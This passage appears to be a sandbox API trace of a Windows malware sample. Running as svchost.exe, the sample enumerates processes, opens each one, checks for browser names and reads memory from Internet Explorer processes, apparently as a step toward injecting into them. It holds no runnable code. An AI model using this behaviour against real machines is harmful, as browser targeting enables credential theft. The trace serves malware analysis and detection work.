	[0196.852] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x61c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x17, th32ParentProcessID=0x394, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1
	[0196.852] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x61c) returned 0x12bc
	[0196.852] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0196.852] StrStrIA (lpFirst="explorer.exe", lpSrch="chrome.exe") returned 0x0
	[0196.853] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0196.853] StrStrIA (lpFirst="explorer.exe", lpSrch="iexplore.exe") returned 0x0
	[0196.853] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0196.853] StrStrIA (lpFirst="explorer.exe", lpSrch="firefox.exe") returned 0x0
	[0196.853] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0196.853] StrStrIA (lpFirst="explorer.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0196.854] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x62c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x2c4, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1
	[0196.854] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x62c) returned 0x0
	[0196.854] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa78, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="shirts_cumshots_compaq.exe")) returned 1
	[0196.855] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xa78) returned 0x12c0
	[0196.855] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0196.855] StrStrIA (lpFirst="shirts_cumshots_compaq.exe", lpSrch="chrome.exe") returned 0x0
	[0196.856] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0196.856] StrStrIA (lpFirst="shirts_cumshots_compaq.exe", lpSrch="iexplore.exe") returned 0x0
	[0196.856] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0196.856] StrStrIA (lpFirst="shirts_cumshots_compaq.exe", lpSrch="firefox.exe") returned 0x0
	[0196.857] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0196.857] StrStrIA (lpFirst="shirts_cumshots_compaq.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0196.857] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa9c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="league.exe")) returned 1
	[0196.858] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xa9c) returned 0x12c4
	[0196.858] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0196.858] StrStrIA (lpFirst="league.exe", lpSrch="chrome.exe") returned 0x0
	[0196.858] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0196.858] StrStrIA (lpFirst="league.exe", lpSrch="iexplore.exe") returned 0x0
	[0196.858] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0196.859] StrStrIA (lpFirst="league.exe", lpSrch="firefox.exe") returned 0x0
	[0196.859] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0196.859] StrStrIA (lpFirst="league.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0196.859] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xaac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="js_sound.exe")) returned 1
	[0196.860] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xaac) returned 0x12c8
	[0196.860] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0196.860] StrStrIA (lpFirst="js_sound.exe", lpSrch="chrome.exe") returned 0x0
	[0196.860] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0196.860] StrStrIA (lpFirst="js_sound.exe", lpSrch="iexplore.exe") returned 0x0
	[0196.860] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0196.860] StrStrIA (lpFirst="js_sound.exe", lpSrch="firefox.exe") returned 0x0
	[0196.861] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0196.861] StrStrIA (lpFirst="js_sound.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0196.861] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xac0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="beast-dry.exe")) returned 1
	[0196.862] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xac0) returned 0x12cc
	[0196.862] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0196.862] StrStrIA (lpFirst="beast-dry.exe", lpSrch="chrome.exe") returned 0x0
	[0196.862] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0196.862] StrStrIA (lpFirst="beast-dry.exe", lpSrch="iexplore.exe") returned 0x0
	[0196.862] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0196.862] StrStrIA (lpFirst="beast-dry.exe", lpSrch="firefox.exe") returned 0x0
	[0196.863] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0196.863] StrStrIA (lpFirst="beast-dry.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0196.863] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xad0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="forecastsgeographic.exe")) returned 1
	[0196.863] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xad0) returned 0x12d0
	[0196.864] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0196.864] StrStrIA (lpFirst="forecastsgeographic.exe", lpSrch="chrome.exe") returned 0x0
	[0196.864] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0196.864] StrStrIA (lpFirst="forecastsgeographic.exe", lpSrch="iexplore.exe") returned 0x0
	[0196.865] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0196.865] StrStrIA (lpFirst="forecastsgeographic.exe", lpSrch="firefox.exe") returned 0x0
	[0196.865] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0196.865] StrStrIA (lpFirst="forecastsgeographic.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0196.866] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xae0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="reno.exe")) returned 1
	[0196.866] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xae0) returned 0x12d4
	[0196.866] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0196.866] StrStrIA (lpFirst="reno.exe", lpSrch="chrome.exe") returned 0x0
	[0196.867] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0196.867] StrStrIA (lpFirst="reno.exe", lpSrch="iexplore.exe") returned 0x0
	[0196.867] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0196.867] StrStrIA (lpFirst="reno.exe", lpSrch="firefox.exe") returned 0x0
	[0196.867] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0196.867] StrStrIA (lpFirst="reno.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0196.867] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xaf0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="specreformwear.exe")) returned 1
	[0196.868] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xaf0) returned 0x12d8
	[0196.868] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0196.868] StrStrIA (lpFirst="specreformwear.exe", lpSrch="chrome.exe") returned 0x0
	[0196.868] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0196.868] StrStrIA (lpFirst="specreformwear.exe", lpSrch="iexplore.exe") returned 0x0
	[0196.869] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0196.869] StrStrIA (lpFirst="specreformwear.exe", lpSrch="firefox.exe") returned 0x0
	[0196.869] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0196.869] StrStrIA (lpFirst="specreformwear.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0196.870] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="rr_publications.exe")) returned 1
	[0196.870] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb00) returned 0x12dc
	[0196.870] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0196.870] StrStrIA (lpFirst="rr_publications.exe", lpSrch="chrome.exe") returned 0x0
	[0196.871] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0196.871] StrStrIA (lpFirst="rr_publications.exe", lpSrch="iexplore.exe") returned 0x0
	[0196.871] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0196.871] StrStrIA (lpFirst="rr_publications.exe", lpSrch="firefox.exe") returned 0x0
	[0196.872] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0196.872] StrStrIA (lpFirst="rr_publications.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0196.872] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb10, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="solo.exe")) returned 1
	[0196.873] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb10) returned 0x12e0
	[0196.873] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0196.873] StrStrIA (lpFirst="solo.exe", lpSrch="chrome.exe") returned 0x0
	[0196.873] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0196.873] StrStrIA (lpFirst="solo.exe", lpSrch="iexplore.exe") returned 0x0
	[0196.873] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0196.873] StrStrIA (lpFirst="solo.exe", lpSrch="firefox.exe") returned 0x0
	[0196.874] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0196.874] StrStrIA (lpFirst="solo.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0196.874] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb20, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="beam.exe")) returned 1
	[0196.874] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb20) returned 0x12e4
	[0196.875] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0196.875] StrStrIA (lpFirst="beam.exe", lpSrch="chrome.exe") returned 0x0
	[0196.875] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0196.875] StrStrIA (lpFirst="beam.exe", lpSrch="iexplore.exe") returned 0x0
	[0196.875] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0196.875] StrStrIA (lpFirst="beam.exe", lpSrch="firefox.exe") returned 0x0
	[0196.875] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0196.875] StrStrIA (lpFirst="beam.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0196.876] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb30, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="configurations.exe")) returned 1
	[0196.876] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb30) returned 0x12e8
	[0196.876] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0196.876] StrStrIA (lpFirst="configurations.exe", lpSrch="chrome.exe") returned 0x0
	[0196.877] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0196.877] StrStrIA (lpFirst="configurations.exe", lpSrch="iexplore.exe") returned 0x0
	[0196.877] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0196.877] StrStrIA (lpFirst="configurations.exe", lpSrch="firefox.exe") returned 0x0
	[0196.878] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0196.878] StrStrIA (lpFirst="configurations.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0196.878] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb40, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="fact-film-anticipated.exe")) returned 1
	[0196.879] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb40) returned 0x12ec
	[0196.879] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0196.879] StrStrIA (lpFirst="fact-film-anticipated.exe", lpSrch="chrome.exe") returned 0x0
	[0196.879] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0196.879] StrStrIA (lpFirst="fact-film-anticipated.exe", lpSrch="iexplore.exe") returned 0x0
	[0196.880] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0196.880] StrStrIA (lpFirst="fact-film-anticipated.exe", lpSrch="firefox.exe") returned 0x0
	[0196.880] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0196.880] StrStrIA (lpFirst="fact-film-anticipated.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0196.881] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb50, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="wanting villages.exe")) returned 1
	[0196.881] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb50) returned 0x12f0
	[0196.882] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0196.882] StrStrIA (lpFirst="wanting villages.exe", lpSrch="chrome.exe") returned 0x0
	[0196.882] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0196.882] StrStrIA (lpFirst="wanting villages.exe", lpSrch="iexplore.exe") returned 0x0
	[0196.883] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0196.883] StrStrIA (lpFirst="wanting villages.exe", lpSrch="firefox.exe") returned 0x0
	[0196.883] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0196.883] StrStrIA (lpFirst="wanting villages.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0196.883] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="engagementresearchersmonkey.exe")) returned 1
	[0196.884] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb60) returned 0x12f4
	[0196.884] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0196.884] StrStrIA (lpFirst="engagementresearchersmonkey.exe", lpSrch="chrome.exe") returned 0x0
	[0196.885] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0196.885] StrStrIA (lpFirst="engagementresearchersmonkey.exe", lpSrch="iexplore.exe") returned 0x0
	[0196.885] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0196.885] StrStrIA (lpFirst="engagementresearchersmonkey.exe", lpSrch="firefox.exe") returned 0x0
	[0196.886] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0196.886] StrStrIA (lpFirst="engagementresearchersmonkey.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0196.886] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="surgical-marcus.exe")) returned 1
	[0196.887] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb70) returned 0x12f8
	[0196.887] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0196.887] StrStrIA (lpFirst="surgical-marcus.exe", lpSrch="chrome.exe") returned 0x0
	[0196.888] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0196.888] StrStrIA (lpFirst="surgical-marcus.exe", lpSrch="iexplore.exe") returned 0x0
	[0196.931] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0196.931] StrStrIA (lpFirst="surgical-marcus.exe", lpSrch="firefox.exe") returned 0x0
	[0196.931] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0196.931] StrStrIA (lpFirst="surgical-marcus.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0196.931] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xc38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0xc0c, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1
	[0196.932] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xc38) returned 0x12fc
	[0196.932] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0196.932] StrStrIA (lpFirst="iexplore.exe", lpSrch="chrome.exe") returned 0x0
	[0196.933] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0196.933] StrStrIA (lpFirst="iexplore.exe", lpSrch="iexplore.exe") returned="iexplore.exe"
	[0196.933] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0196.933] StrStrIA (lpFirst="iexplore.exe", lpSrch="firefox.exe") returned 0x0
	[0196.933] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0196.933] StrStrIA (lpFirst="iexplore.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0196.933] NtQueryInformationProcess (in: ProcessHandle=0x12fc, ProcessInformationClass=0x0, ProcessInformation=0x101f2e4, ProcessInformationLength=0x18, ReturnLength=0x101f300 | out: ProcessInformation=0x101f2e4, ReturnLength=0x101f300) returned 0x0
	[0196.933] ReadProcessMemory (in: hProcess=0x12fc, lpBaseAddress=0x7ffdb000, lpBuffer=0x101f0cc, nSize=0x1d8, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101f0cc*, lpNumberOfBytesRead=0x101f310*=0x1d8) returned 1
	[0196.933] ReadProcessMemory (in: hProcess=0x12fc, lpBaseAddress=0x2b11c0, lpBuffer=0x101ee3c, nSize=0x290, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101ee3c*, lpNumberOfBytesRead=0x101f310*=0x290) returned 1
	[0196.934] ReadProcessMemory (in: hProcess=0x12fc, lpBaseAddress=0x2b1998, lpBuffer=0x101f40c, nSize=0x20, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101f40c*, lpNumberOfBytesRead=0x101f310*=0x20) returned 1
	[0196.934] StrStrIW (lpFirst="Winsta0\\Default", lpSrch="default") returned="Default"
	[0196.934] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xc94, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0xc38, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1
	[0196.934] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xc94) returned 0x1300
	[0196.935] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0196.935] StrStrIA (lpFirst="iexplore.exe", lpSrch="chrome.exe") returned 0x0
	[0196.935] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0196.935] StrStrIA (lpFirst="iexplore.exe", lpSrch="iexplore.exe") returned="iexplore.exe"
	[0196.935] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0196.935] StrStrIA (lpFirst="iexplore.exe", lpSrch="firefox.exe") returned 0x0
	[0196.936] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0196.936] StrStrIA (lpFirst="iexplore.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0196.936] NtQueryInformationProcess (in: ProcessHandle=0x1300, ProcessInformationClass=0x0, ProcessInformation=0x101f2e4, ProcessInformationLength=0x18, ReturnLength=0x101f300 | out: ProcessInformation=0x101f2e4, ReturnLength=0x101f300) returned 0x0
	[0196.936] ReadProcessMemory (in: hProcess=0x1300, lpBaseAddress=0x7ffde000, lpBuffer=0x101f0cc, nSize=0x1d8, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101f0cc*, lpNumberOfBytesRead=0x101f310*=0x1d8) returned 1
	[0196.936] ReadProcessMemory (in: hProcess=0x1300, lpBaseAddress=0x911c0, lpBuffer=0x101ee3c, nSize=0x290, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101ee3c*, lpNumberOfBytesRead=0x101f310*=0x290) returned 1
	[0196.936] ReadProcessMemory (in: hProcess=0x1300, lpBaseAddress=0x919ba, lpBuffer=0x101f40c, nSize=0x20, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101f40c*, lpNumberOfBytesRead=0x101f310*=0x20) returned 1
	[0196.936] StrStrIW (lpFirst="Winsta0\\Default", lpSrch="default") returned="Default"
	[0196.936] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x914, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x34c, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1
	[0196.937] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x914) returned 0x1304
	[0196.937] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0196.937] StrStrIA (lpFirst="taskeng.exe", lpSrch="chrome.exe") returned 0x0
	[0196.937] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0196.937] StrStrIA (lpFirst="taskeng.exe", lpSrch="iexplore.exe") returned 0x0
	[0196.938] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0196.938] StrStrIA (lpFirst="taskeng.exe", lpSrch="firefox.exe") returned 0x0
	[0196.938] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0196.938] StrStrIA (lpFirst="taskeng.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0196.938] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x214, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x914, pcPriClassBase=6, dwFlags=0x0, szExeFile="tadiapce.exe")) returned 1
	[0196.939] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x214) returned 0x1308
	[0196.939] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0196.939] StrStrIA (lpFirst="tadiapce.exe", lpSrch="chrome.exe") returned 0x0
	[0196.939] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0196.939] StrStrIA (lpFirst="tadiapce.exe", lpSrch="iexplore.exe") returned 0x0
	[0196.940] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0196.940] StrStrIA (lpFirst="tadiapce.exe", lpSrch="firefox.exe") returned 0x0
	[0196.940] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0196.940] StrStrIA (lpFirst="tadiapce.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0196.940] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xaa8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0196.941] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xaa8) returned 0x130c
	[0196.941] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0196.941] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0196.941] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0196.941] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0196.942] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0196.942] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0196.942] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0196.942] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0196.942] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x110, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x214, pcPriClassBase=6, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0196.943] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x110, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x214, pcPriClassBase=6, dwFlags=0x0, szExeFile="svchost.exe")) returned 0
	[0196.943] CloseHandle (hObject=0x188) returned 1
	[0196.944] Sleep (dwMilliseconds=0x64) 
	[0197.060] GetCurrentProcessId () returned 0x110
	[0197.060] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x188
	[0197.062] Process32First (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1
	[0197.063] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x51, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1
